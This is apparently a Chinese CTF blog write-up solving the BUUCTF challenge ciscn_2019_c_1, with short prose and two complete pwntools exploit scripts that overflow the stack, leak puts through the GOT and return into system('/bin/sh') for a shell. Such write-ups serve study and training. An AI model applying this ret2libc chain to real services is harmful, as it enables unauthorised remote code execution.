
BUUCTF ciscn_2019_c_1

查看保护状态

https://blog.restro.cn/wp-content/uploads/2021/08/image-13.png

打开 IDA 查看，发现不存在后门函数，这道题目也没有给我 libc，那么这里借助 ret2libc 来实现 getshell。

题目给的是 Ubuntu 18 的版本。

https://blog.restro.cn/wp-content/uploads/2021/08/image-15.png

IDA 中发现存在一个栈溢出，并且看到了一个 strlen：只需要放一个 \0 截断即可，这样我们输入的数据就不会被加密处理（这里的加密方式只是简单的异或，异或两次也能恢复原来的值）。

https://blog.restro.cn/wp-content/uploads/2021/08/image-14.png

在 leak 出来的数据前面有一些无效的字符，所以在接收 puts 地址的时候需要先 recvline 两次。

EXP

（如果需要打远程，请使用 LibcSearcher；否则请使用正确的 libc 版本。）

from pwn import *

# Python 2 / pwntools solve script (print statement, str payloads) for BUUCTF ciscn_2019_c_1.
# Stage 1: overflow -> puts(puts@got) -> return to main, to leak one libc address.
# Stage 2: overflow again -> system("/bin/sh") computed from the leaked libc base.
context(os="linux", arch="amd64", log_level="debug")
p = process("./ciscn_2019_c_1")
#p = remote("node4.buuoj.cn","28569")
elf = ELF("./ciscn_2019_c_1")


# Gadget addresses are absolute, so the binary is assumed non-PIE — confirm with checksec.
ret=0x4006b9   # lone `ret`; presumably keeps the stack 16-byte aligned before system() — confirm
rdi=0x400c83   # pop rdi ; ret (named pop_rdi_ret in the second script)
main=elf.sym['main']
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

p.recvuntil('choice!\n')
p.sendline('1')
# Leading '\0' makes the binary's strlen() see an empty string, so its XOR "encryption"
# loop never touches the bytes that follow. 0x50-1+8 is the author's offset to the saved
# return address (assumes a 0x50-byte buffer plus an 8-byte saved rbp — confirm in IDA).
payload='\0'+'a'*(0x50-1+8)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.recvuntil("encrypted\n")
p.sendline(payload)
#gdb.attach(p)
# Two lines of unrelated output precede the leaked address (see the prose note above).
p.recvline()
p.recvline()
# The leak is the raw address bytes up to the newline; pad to 8 bytes for u64().
puts_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
print "puts is:"+hex(puts_addr)
#gdb.attach(p)
# Local libc matching the Ubuntu 18 target; for a remote target without a known libc the
# author suggests LibcSearcher instead (see the second script).
libc = ELF("./libc-2.27.so")
libc_base=puts_addr-libc.sym['puts']
system_addr=libc_base+libc.sym['system']
bin_sh=libc_base+next(libc.search("/bin/sh"))

print "libc_base is "+hex(libc_base)
print "system_addr is "+hex(system_addr)
print "str_bin_sh is "+hex(bin_sh)

# Second overflow: same '\0' trick, then ret ; pop rdi ; "/bin/sh" ; system.
payload1='\0'+'a'*(0x50-1+8)+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system_addr)
p.sendlineafter("Input your choice!\n","1")
p.sendlineafter("Input your Plaintext to be encrypted\n",payload1)

p.interactive()

EXP2

另一种写法

from pwn import *
from LibcSearcher import *
# Variant solve script (Python 2 / pwntools). Resolves the remote libc with LibcSearcher
# from the leaked puts address instead of loading a local libc file.
# io = process('./ciscn_2019_c_1')
io = remote("node4.buuoj.cn","28569")
elf = ELF('./ciscn_2019_c_1')
# libc=ELF('./libc-2.27.so')
context.log_level='debug'


puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
pop_rdi_ret = 0x0000000000400c83   # pop rdi ; ret
main_addr = 0x400B28               # hard-coded; the first script reads elf.sym['main'] instead
ret = 0x00000000004006b9           # lone `ret`; presumably for 16-byte stack alignment before system() — confirm


io.recvuntil('Input your choice!\n')
io.sendline('1')
io.recvuntil('Input your Plaintext to be encrypted\n')


# Stage-1 chain: puts(puts@got), then back to main_addr for a second round.
# Unlike the first script there is no leading '\0', so the padding is run through the
# binary's XOR loop; per the strlen note above, that loop stops at the first NUL byte,
# which here falls inside p64(pop_rdi_ret). decrypt() below is the author's model of it.
payload='a'*(0x50+8)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
payload2=[]
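def decrypt(content, out=None):
    """Model the binary's byte-wise XOR "encryption" of *content*.

    Mapping reproduced from the original nested checks: lowercase letters are
    XORed with 0xd, uppercase letters with 0xe, and every other byte with 0xf.

    Args:
        content: the plaintext as a str (each element is passed to ord()).
        out: list to append the transformed byte values to. Defaults to the
            module-level ``payload2`` list, which is what the original mutated.

    Returns:
        The list that was appended to, so callers need not rely on the global.

    NOTE(review): the original's digit test ``>47 or <=57`` was a tautology, so
    every non-letter byte ends up XORed with 0xf; that behaviour is kept here.
    The binary itself likely limits that branch to digits and leaves other
    bytes untouched — confirm in IDA before trusting this model for bytes
    outside [0-9A-Za-z].
    """
    if out is None:
        out = payload2
    for ch in content:
        value = ord(ch)
        if 97 <= value <= 122:      # 'a'..'z'
            out.append(value ^ 0xd)
        elif 65 <= value <= 90:     # 'A'..'Z'
            out.append(value ^ 0xe)
        else:                       # everything else (see NOTE above)
            out.append(value ^ 0xf)
    return out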
decrypt(payload)
payload2 = bytearray(payload2)

# Diagnostic only: payload2 is never sent (the raw payload goes out below).
# NOTE(review): str + bytearray concatenation may raise TypeError here — confirm.
print "payload2----->" + payload2
# pause()


io.sendline(payload)
io.recvuntil('\x40\x0a')   # '\x40\x0a' == "@\n": bytes the author saw right before the leak — confirm against real output
puts_addr = u64(io.recv(6).ljust(8,'\x00'))   # 6 address bytes, padded to 8 for u64()
libc = LibcSearcher('puts',puts_addr)   # pick a candidate libc from the leaked puts offset
# libc_base = puts_addr - libc.sym['puts']
libc_base = puts_addr - libc.dump('puts')

print "libc_base----->" + hex(libc_base)
# system=libc.sym['system']
system=libc.dump('system')

binsh = libc   # NOTE(review): unused (dead assignment); binsh_addr is computed from libc.dump() below
system_addr = libc_base+system
binsh_addr = libc_base+libc.dump('str_bin_sh')
# binsh_addr=next(libc.search("/bin/sh"))+libc_base

# Stage 2: ret ; pop rdi ; "/bin/sh" ; system (same padding as stage 1).
payload = 'a'*(0x50+8)+p64(ret)+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
io.recvuntil('Input your choice!\n')
io.sendline('1')
io.recvuntil('Input your Plaintext to be encrypted\n')
# gdb.attach(io,'b *0x400AE8')
io.sendline(payload)

io.interactive()

2021-08-06